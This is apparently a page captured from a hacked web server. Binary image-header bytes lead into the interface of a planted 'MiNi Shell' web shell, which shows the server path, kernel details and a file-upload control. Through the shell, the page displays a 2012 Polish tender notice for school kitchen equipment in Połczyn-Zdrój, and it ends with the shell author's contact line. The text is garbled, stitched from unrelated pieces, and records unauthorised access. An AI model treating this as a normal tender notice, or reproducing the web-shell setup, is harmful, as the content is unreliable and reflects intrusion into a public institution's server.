JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/304346-N-2012.html

<p class="kh_header"><b>Świdwin: Dostawa i montaż wyposażenia kuchni do Zespołu Szkół Ponadgimnazjalnych w Połczynie-Zdroju</b><br>
<b>Numer ogłoszenia: 304346 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia kuchni do Zespołu Szkół Ponadgimnazjalnych w Połczynie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Meble kuchenne - wyposażenie podstawowe:Zlewozmywak jednokomorowy z półką ze stali nierdzewnej z przedłużonym blatem z prawej strony 1200x600x850 mm wraz z baterią umywalkową jednootworową łokciową Monolith - 8 kompl, Stół roboczy z 2 szufladami i szafką z półkami ze stali nierdzewnej 1200x600x850 mm - 8 szt., Szafka na produkty stal nierdzewna - 2 szt., Szafa gospodarcza SMD 62 na środki czystości 1800x600x500mm - 1 szt, Bateria zlewozmywakowa stojąca, jednootworowa ze spryskiwaczem i wylewką - 1 szt., Stół ze zlewem i otworem pod rozdrabniacz, bez półki 700x700x850 mm - 1 szt., Stół centralny ze stali nierdzewnej z półką, bez rantu, 1200x700x850 mm - 6 szt., Stół cateringowy składany 1830x760x740 mm - 4 szt, Szafa przelotowa 1000x600x2000 mm - 1 szt, Umywalka niezabudowana ze stali nierdzewnej, 400x295x150 mm - 1 szt.
Garnki, sztućce, talerze, drobny sprzęt kuchenny: Patelnia nieprzywierająca ze stali węglowej i nierdzewnej śr. 20 - 8 szt., śr 28 - 8 szt.,Patelnia grillowa ryflowana 230x230 mm - 8 szt., Garnki z pokrywkami:
Garnek średni  śr 16 cm V-1.9 l - 8 szt.
Garnek średni  śr 20 cm V-4.4 l - 8 szt
Garnek wysoki  śr 20 cm V-6.3 l - 8 szt
Rondel do sosów śr 24 cm - 8 szt.
Miski metalowe
Miska metalowa satynowana śr. 16 cm V-1.1 l - 8 szt.
Miska metalowa polerowana śr. 20 cm V-1.9 l - 16 szt.
Miska metalowa polerowana śr. 32 cm V-6.5 l - 8 szt.
Deski do krojenia z polietylenu
Deska 25x15x10 mm - 16 szt.
Deska 30x22x10 mm - 16 szt.
Tarka sześciokątna - 8 szt
Noże ze stali chromowo-molibdenowej:
Nóż masarski L-22 cm - 8 szt.
Nóż do filetowania giętki L-22 cm - 8 szt
Nóż do pieczeni L-24 cm - 8 szt
Nóż do chleba L-24 cm - 2 szt.
Nóż do obierania L-10 cm - 2 szt
Ostrzałka do noży elektryczna 230V; 3 stopnie ostrzenia zgrubny, drobny, polerowanie - 1 szt.
Nożyce do drobiu - 2 szt, Tłuczek/siekacz zmiękczający mięso 56 noży - 1 szt,
Sitko z siatką śr 20 cm - 8 szt., Cedzak stalowy średni  z uchwytami - 8 szt.,
Komplet sztućców kuchennych:
Chochla V-012 l - 8szt
Chochla V-0.5 l - 2 szt.
Chochla V-0.25 l - 8 szt.
Łyżka cedzakowa monoblok śr 12 cm - 8 szt
Łyżka do serwowania L-30.5 cm - 8 szt.
Widelec do przewracania L-33 cm - 8 szt.
Łyżka do spaghetti L-28 cm - 8 szt.
Łopatka do przewracania L-32 cm 8 szt.,
Skrobka plastikowa do ciasta 141x100 mm - 8 szt,Mikser o mocy 450 W, z 5-stopniową regulacją prędkości pracy, funkcją Turbo, trybem pulsacyjnym, wyposażony w przystawkę miksującą oraz pojemnik do miksowania. - 8 szt., Koszyk na pieczywo z polipropylenu, owalny  37.5x15x7 cm - 8 szt., Serwetnik h-80 mm - 5 szt., Sosjerka - 4 szt., Zestaw przyprawowy 5-elementowy - 2 szt.,Talerze płytkie porcelana
Średnica 25 cm - 24 szt.
Średnica 16.5 cm - 24 szt.
Średnica 28 cm - 24 szt.,
Talerz głęboki porcelana średnica 23cm - 24 szt.,
Salaterki porcelana
V-05 l - 16 szt.
V-0.9 l - 8 szt.
V-1.4 l - 8 szt.,
Waza do zupy z łyżką - 8 szt., Barszczówka 0.4 l - 24. szt., Kubek 0.28 l - 24 szt.,Filiżanki 0.28 l - 24 szt., Spodek do filiżanki - 24 sztuki,  Cukiernica otwarta 0.27 l - 8 szt., Szklanka do wody 0.30 l - 30 szt.,
Szklanka wysoka 0.33 ml - 30 szt., 
Półmisek owalny porcelana:
204x163 mm - 8 szt.
253x201 mm - 8 szt.
295x224 mm - 8 szt.
Sztućce komplet zestaw restauracyjny:
Łyżka stołowa - 36 szt.
Widelec stołowy - 36 szt
Nóż stołowy - 36 szt.
Łyżeczka do herbaty - 36 szt.
Widelczyk do ciasta - 36 szt.
Widelec do ryb - 12 szt.
Nóż do ryb - 12 szt.
Widelec półmiskowy - 12 szt
Łyżeczka do cukru - 12 szt,
Taca kelnerska okrągła antypoślizgowa mahoniowa laminowana o średnicy 36 cm - 8 szt., Wazonik stołowy - 8 szt., Warniki 19 l ze stali nierdzewnej wysokopolerowanej; zakres regulacji temperatury 30-100 °C; termostat bezpieczeństwa; wskaźnik poziomu płynu w zbiorniku; bezkroplowy kranik - 1 szt., Warniki 19 l ze stali nierdzewnej wysokopolerowanej; zakres regulacji temperatury 30-100 °C; termostat bezpieczeństwa; wskaźnik poziomu płynu w zbiorniku; bezkroplowy kranik - 1 szt. , Profesjonalny pojemnik termoizolacyjny GN 1/1 200 deluxe  600x400x290; wykonany ze spienionego polipropylenu
 waga 1.2 kg - 2 szt., Patera na owoce i ciasta 3 stopniowa gładka - 2 szt., Taca do serwowania trzypoziomowa d 480 mm h 44 mm - 2 szt., Wózek  3-pólkowy do przewożenia potraw -  1 szt., Taca kelnerska antypoślizgowa mahoniowa laminowana 55x40cm -  5 szt., Zestaw mop z 2 wiadrami 18 l - 1 kompl., Dzbanek do napojów 1 l - 8 szt., Pojemnik na odpady 40 l z pokrywą otwartą - 8 szt., Worek do wyciskania 8-65 cm standard - 3 szt., Komplet stalowych końcówek 16 szt. do worka do wyciskania - 1 szt., Wycinarki gładkie 2-11 cm - 2 kompl. , Nóż do krojenia tortu L-31 cm, Nóż do krojenia ciast 36 cm, ostrze falowane, Nóż do krojenia biszkoptu 30 cm, ostrze falowane, Szpatuła do masy cukierniczej 26 cm, ostrze gładkie, Łopatka kątowa 31/26 cm, Rękawice ochronne 230 oc 43 cm - 8 par, Patera do ciasta na podstawie śr. 33 cm - 2 szt., Stojak obracany do tortów i ciast - szklany śr. 300 mm , Syfon isi cream profi whip plus - do wytwarzania bitej śmietany, kremów oraz musów 1 l z końcówkami dozującymi: prostą i tulipan - 3 szt., Naboje do syfonu cream pakowane po 50 szt - 1 op., Dzbanek do mleka V-0.28 l -  6 szt., Palnik do kremu brule - 3 szt., Tasak 16 cm ostrze ze stali chromowo-molibdenowej - 2 szt., Pojemniki stalowe z pokrywką Gn:
Pojemnik stalowy Gn 1/2 2000 standard - 2 szt.
Pokrywka Gn1/2 z uszczelką silikonową - 2 szt.
Pojemnik stalowy Gn 1/3 200 standard - 3 szt
Pokrywka Gn 1/3 z uszczelką silikonową - 3 szt
Urządzenia kuchenne elektryczne:
Kuchnia mikrofalowa - kuchenka mikrofalowa z grillem kwarcowym, termoobiegiem, pojemność 40 l, moc mikrofal: 900 W, moc grilla kwarcowego: 1300 W, moc termoobiegu: 1450 W ((40-250°C),   5 poziomów energetycznych mikrofal (90 - 900 W) - kombinacja: mikrofale + termoobieg, mikrofale + grill kwarcowy, 7 programów gotowania i pasteryzacji automatyczne programy; 10 programów express i automatyczne programy rozmrażania; 7 gotowania i pasteryzacji automatyczne programy; 1 program do pieczenie ciasta; przycisk informacyjny i wyboru języka; funkcja oszczędzania energii, podgrzewania; ustawianie zegara: do 90 min.; +1 automatyczny minutnik; regulacja czasu (krócej/dłużej); emaliowany talerz obrotowy: 36,2 cm - 1 szt, Lodówka na próbki; opływowy kształt- brak ostrych kantów; cichy agregat; na drzwiach instrukcja pobierania i przechowywania próbek w komplecie do chłodziarki powinno być załączonych dziewięć kaset ( każda oznaczona) z ośmioma pojemnikami o pojemności 220 ml w każdej z nich - 1 szt., Kuchnia wolnostojąca z płytą indukcyjną lub ceramiczną i piekarnikiem, wymiary 850x600x600 mm; klasa energetyczna A+; 4 pola grzejne; pole poszerzone: kolor stal nierdzewna; funkcje piekarnika: Termoobieg, Rozmrażanie, Turbogrill Ogrzewanie górne i dolne Szybkie grillowanie Grzejnik dolny + wentylator; prowadnice teleskopowe; szuflada na naczynia regulowane nóżki; pojemność piekarnika 60-80 litrów - 8 szt., Blender ręczny-moc min. 700W; liczba poziomów obrotów 5; funkcja turbo, końcówka do miksowania, końcówka do ubijania (trzepaczka), tarcze do krojenia i ścierania, ostrze do rozdrabniania/siekania, pojemnik do siekania z pokrywką, pojemność misy min. 1l;  instrukcja obsługi w języku polskim - 8 szt., Maszynka do mielenia; Moc  2000 W, Wydajność  2.2 kg/1min; Liczba nasadek  1, Wsteczny bieg; Metalowa komora mieląca; Zabezpieczenie chroniące silnik przed zniszczeniem w przypadku zablokowania; Taca podająca
Nasadka masarska do kiełbas, Tarcza do makaronu wstążki, Tarcza do ciastek; Nóżki antypoślizgowe; Noże ze stali nierdzewnej; Wykonanie - stal nierdzewna
- 4 szt., Szafa chłodnicza ze stali nierdzewnej GN 2/1 700 l; elektroniczny termostat; cyfrowy wyświetlacz; automatyczne odparowanie skroplin; samodomykające drzwi z zamkiem; regulowane nóżki ze stali nierdzewnej, Zamrażarka skrzyniowa 300 l. w komplecie 1 kosz obudowa z blachy malowanej proszkowo; elektroniczny wyświetlacz temperatury; możliwość regulacji temperatury; grube ścianki izolacyjne; posiada 4 kółka z hamulcami; wbudowany zamek na klucz, Naświetlacz szufladowy ze stali nierdzewnej; czas naświetlania 150 sek.; jednorazowa dezynfekcja 30 jajek, Frytownica elektryczna z kranem poj. 12l, moc 3,25 kW, zasilanie 230 V, wykonana ze stali nierdzewnej, wym. 290x440x410 mm, Toster  na 6 tostów;  moc 2.5kW, regulacja czasu opiekania, automatyczny wyłącznik, Otwieracz do konserw mocowany do blatu zaciskiem ślimakowym i wkrętami, nóż z kółkiem w komplecie, otwiera puszki od 2 do 40 cm, wysokość 64 cm , Kuchenka indukcyjna o mocy 3500 W, obudowa ze stali nierdzewnej, zasilanie 230V, waga 6.6 kg, wymiary 340x450x120 mm - 2 szt., Młynek koloidalny; Moc elektryczna: 0,5 kW; Materiał wykonania: stal nierdzewna; tarcza rozdrabniająca wyk. ze stali nierdzewnej; auto-rewers; wbudowane zabezpieczenie pneumatyczne; posiada włącznik pneumatyczny w zestawie; zestaw montażowy Quick-Lock, gwarantujący szybką instalację; zabezpieczenie przed przeciążeniem, ręczne resetowanie; klucz do odblokowywania młynka w standardzie; możliwość podłączenia zmywarki; moc 0,7 KM, Zmywarka uniwersalna 500x500 4,9 kW 400V z dozownikiem płynu myjącego i nabłyszczającego oraz pompą zrzutową; funkcja wyparzania; cyfrowy panel; w komplecie kosz na talerze i kosz uniwersalny, wymiary 56.5x62.5x82.5 cm, Profesjonalna zmywarka gastronomiczna z funkcją wyparzania SILANOS 3-fazowa przeznaczona do mycia wszelkiego typu naczyń stołowych: talerzy, szkła, kubków oraz sztućców. Wykonanie - stal nierdzewna. W zmywarce jest możliwość umycia talerzy o maksymalnej średnicy 32 cm. 2 pary ramion myjąco-płuczących (2 na górze i 2 na dole) zapewniają właściwą jakość mycia i wyparzania. Cykl mycia wynosi 120 s. w komplecie z podstawą pod zmywarkę 585x565x450, Podgrzewacz z kociołkami ze stali nierdzewnej; w komplecie dwa kociołki i dwa pojemniki na paliwo 2x4 l. classic - 2 szt., Podgrzewacz roll top 9 l. prostokątny ze stali nierdzewnej; uchwyt umożliwiający montaż grzałki elektrycznej; w komplecie dwa pojemniki na paliwo, Podgrzewacz okrągły 7,5 l. classic; ze stali nierdzewnej; w komplecie pojemniki na paliwo, 18	Kociołek do zupy 10 l. z chochlą; kociołek, pokrywa, pojemnik na wodę wykonane ze stali nierdzewnej; obudowa wykonana z tworzywa wysokoudarowego; łyżka w komplecie	1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.15.12.00-7, 39.17.30.00-5, 39.71.10.00-9, 39.22.10.00-7, 39.22.11.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.1. 	Wadium należy wnieść w wysokości 4 000,00 zł.

Wadium może być wnoszone w jednej lub kilku formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, nr 66, poz. 596 i Nr 216, poz. 1824).  
1.2.	Wadium w pieniądzu wpłacać należy na konto Starostwa Powiatowego w Świdwinie nr   11 1240 3682 1111 0000 4200 9670
1.3.	Dokument przelewu należy opisać odpowiednio do zadania następująco:

Wadium - ZP.272.8.2012 ZSP wyposażenie kuchni
1.4.	Kopię przelewu należy załączyć do oferty.
1.5.	Dokument wniesienia wadium w formie innej niż pieniężna należy dołączyć do oferty w oryginale lub kopii potwierdzonej za zgodność przez wykonawcę.
1.6.	Termin złożenia wadium - do dnia  27.08.2012 r. do godz. 9:00
1.7.	Wadium wnoszone w pieniądzu uznane będzie za wniesione w terminie tylko w przypadku wpłynięcia na konto Zamawiającego przed upływem terminu wyznaczonego na  złożenie oferty.
1.8.	Zgodnie z postanowieniami art. 46 Ustawy - Prawo zamówień publicznych, Zamawiający dokonuje zwrotu wadium w n / w wypadkach:

Niezwłocznie:
-	wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy w sprawie zamówienia publicznego 
-	na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. 
Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy wykonali, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, minimum jedną dostawę urządzeń i wyposażenia, ujętego w specyfikacji o wartości 150 000,00 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiatswidwinski.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie
ul. Mieszka I 16
78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Świdwinie
ul. Mieszka I 16
78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2012.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com